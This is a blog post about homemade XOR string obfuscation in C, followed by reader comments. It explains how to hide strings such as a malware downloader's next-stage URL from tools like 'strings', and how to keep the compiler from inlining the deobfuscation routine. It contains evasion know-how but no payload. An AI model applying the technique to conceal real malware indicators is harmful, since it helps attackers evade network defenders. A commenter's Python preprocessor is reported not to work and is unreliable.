DIY String obfuscation for plain C

Say you want to write a C program, but you want to avoid including plain strings within the binary. This is something often done by malware authors, for example, to avoid easy extraction of so called indicators of compromise. I can also imagine a legitimate business that uses string obfuscation to make reverse engineering of their software harder to protect their intellectual property. This is often called <em>string obfuscation</em>. <span id="more-4734"></span> <h2>Motivation</h2> Let's stay with malware as an example use-case for string obfuscation and let's also consider a simple downloader, i.e. a malware with the sole purpose to download something from the Internet - the so called <em>next stage</em> - and execute it on the targeted system. Let's further assume, the downloader uses HTTP. This is a common choice for malware authors, probably because it nicely blends into legitimate network traffic and it is easy to use: The Windows API supports HTTP natively and setting up a HTTP server is easy as pie. Since the downloader <em>somhow</em> needs to know, what to download, the URL of the next-stage has to be contained in the downloader <em>somehow</em>. Calling `strings malware.exe | grep http` for example is a very easy way to "extract" the next-stage URL from malware when it is just included as a plain string in the binary. But the author ((or, to be more precise, the operator of the malware)) has an interest in making it harder to extract the URL from the malware: If I - as a defender - can extract the next-stage URL that easily, I can just block the URL (or even the domain) from resolving in my network and hence make the malware ineffective. Depending on where the next-stage URL is hosted, it may even be possible to notify the hoster of malicious activity and cause a take down of the URL or domain. <h2>The Naïve Approach</h2> The most obvious approach the archive the goal is, to replace every string in the source code with a call to a function that returns the actual string. So ```c download("http://example.com/next-stage.exe") ``` would become something like ```c download(deobfuscate("mambojumbo123", "more arguments if needed", 123)) ``` Doing this by hand is annoying, time consuming and error prone. So let's automate this step, i.e. call some sort of pre-processor that takes the original source code as input and outputs source code with all strings replaced by calls to the `deobfuscate` function. But there is a problem with this approach: The original source code used a constant string, which does not need to be freed explicitly. But the `deobfuscate` function will allocate some new memory (on the heap) to put the deobfuscated variant of the string in it. Hence the program will start to leak memory, which is unacceptable! <h2>Don't Leak</h2> To avoid memory leakage, we want to somehow establish a contract with the user of this obfuscation technique, such that "protected strings" are freed after use. Let's re-implement `strdup` but give it a different name: ```c char *protect(char *s) { char *ret = malloc(sizeof(char) * (strlen(s) + 1)); if (ret == NULL) return NULL; strcpy(ret, s); return ret; } ``` The function accepts a string as its only argument, allocates enough memory to store a copy of it and returns a pointer to this memory. The contract with the author of C code now is, that every string that should be obfuscated, needs to be passed to the `protect` function. This forces a developer to free the string after usage: ```c char *s = protect("http://example.com/next-stage.exe"); if (s != NULL) { download(s); free(s); } ``` This also makes pattern-matching for string much easier: we can just regex for something like this ``` protect\("([^"]+?)"\) ``` and replace it with calls to `deobfuscate`. <h2>Concrete Obfuscation</h2> Up to this point, we haven't talked about a concrete implementation of the obfuscation. For starters, we will take something simple: generate a random array - a key - for every string to be protected and `deobfuscate` just XORs the obfuscated string with the key to get the original string back: ```c char *deobfuscate(char *buffer, int len, char *key, int key_len) { char *ret = malloc(sizeof(char) * (len + 1)); ret[len] = '\0'; for (int i = 0; i < len; i++) { ret[i] = buffer[i] ^ key[i % key_len]; } return ret; } ``` So Instead of `protect("example.com")` the source code that will be compiled will contain something like this: ```c deobfuscate("\x3a\xe1\x08\x12\x60\xd0\x6f\x71\xfa\x06\x12", 11, "\x5f\x99\x69\x7f\x10\xbc\x0a", 7); ``` The original source codes will only contain calls to `protect` and no calls to `deobfuscate` and the source code with obfuscated strings will not contain any calls to the `protect` function anymore and only calls to `deobfuscate`. Implementation of such a pre-processing script is left as an exercise to the reader. <h2>The Twist</h2> I felt pretty confident with this second approach, compiled the source code with all interesting strings obfuscated and called strings on the resulting executable. To my surprise, it still contains the next-stage URL. Or at least, fragments of it. To understand, what happened, I launched Ghidra ((The Reverse Engineering Tool developed by the NSA and released as open source a few months ago. This is a big deal because it basically democratized the reverse engineering community ... but I digress)) and threw the binary into it. The place where there should have been a call to `deobfuscate` just lead to the following decompiled code: ``` BYTE *Memory = malloc(0xc); if (Memory != NULL) { *(Memory + 8) = 0x6d6f63; *Memory = 0x2e656c706d617865; /* ... */ } ``` There is no call to `deobfuscate` but merely a call to `malloc`. And where do these hexadecimal numbers come from? Taking endianness into account, the two assignments result in an array with the following content: ``` {0x65, 0x78, 0x61, 0x6d, 0x70, 0x6c, 0x65, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x00, 0x00, 0x00, 0x00} ``` which is equivalent to the string `example.com`. And while it was harder to extract the string from the binary, this is not the intended result! What happened? You might already have guessed that the `deobfuscate` function was inlined by the compiler as a performance optimization. This explains why the call to `deobfuscate` is gone and the call to `malloc` from <em>within</em> the function is there. And the compiler figured out that the `for` loop only depends on variables that have constant values. Which makes it possible to execute the loop at compile time and just generate code that assigns the content from <em>after</em> the loop to the array. <h2>The Solution</h2> Disabling `-O3` optimization was not an option for me. I talked with <a href="https://blag.nullteilerfrei.de/author/tobi/">tobi</a> about this and he suggested a very simple solution: the compiler is only <em>able</em> to inline the `deobfuscate` function because it knows at compile time, how `deobfuscate` is defined. Placing the function into a separate module - which is a good idea anyway to make code reusage easier - avoids the above-described optimization entirely because the compiler only knows at link-time, how `deobfuscate` is defined, which is too late for compile-time optimizations. The result is a binary that does not contain the string in plain text anymore! Great success.

3 Replies to “DIY String obfuscation for plain C”

msn says:

2019-07-21 at 1:05 pm

There are some other options: Turn off optimization for a certain part of code: For GCC: ``` #pragma GCC push_options #pragma GCC optimize ("O0") void foo(void) {} #pragma GCC pop_options ``` For MSVC: ``` #pragma optimize( "", off ) void foo(void) {} #pragma optimize( "", on ) ``` Do Not inline: GCC ``` void __attribute__ ((noinline)) foo() {} ``` MSVC: ``` __declspec(noinline) void foo(void) {} ```

Anvol says:

2020-02-03 at 8:49 pm

use it: python3 script.py code.c ``` import re import binascii import itertools import sys, getopt def byte_xor(ba1, ba2): return bytes([_a ^ _b for _a, _b in zip(ba1, ba2)]) def encode_plaintext(plaintext): one_time_pad = bytes([0x01, 0x0c, 0x1e]) # put here your key one_time_pad *= 100 # should exceed any string in your C code ciphertext = byte_xor(bytes(plaintext, 'ascii'), one_time_pad) return ciphertext def main(argv): p = re.compile(r"protect("(.+?)")") #slightly fixed for filepath in argv: with open(filepath, 'r+') as content_file: content = content_file.read() matches = p.finditer(content, re.MULTILINE) for matchNum, match in enumerate(matches, start=1): print("Match {matchNum} was found at {start}-{end}: {match}".format(matchNum = matchNum, start = match.start(), end = match.end(), match = match.group())) for groupNum in range(0, len(match.groups())): groupNum = groupNum + 1 plaintext = match.group(groupNum) # print("Group {groupNum} found at {start}-{end}: {group}".format(groupNum = groupNum, start = match.start(groupNum), end = match.end(groupNum), group = plaintext)) encoded_bytes = encode_plaintext(plaintext) formated_str = "deobfuscate("" + "".join(str(hex(encoded_byte)).replace("0x", "\x") for encoded_byte in encoded_bytes) + "", " + str(len(encoded_bytes)) +")" print(plaintext, ":encoded to:", formated_str) content = content.replace(match.group(), formated_str) # print(content) f = open(filepath, "w") f.write(content) f.close() pass return 0 if __name__ == "__main__": main(sys.argv[1:]) ```

1. Catman says:
  
  2020-12-27 at 10:45 pm
  
  Hello Anvol, thank you for your python script, unfortunately, it doesn't work.

DIY String obfuscation for plain C

3 Replies to “DIY String obfuscation for plain C”

Leave a Reply Cancel reply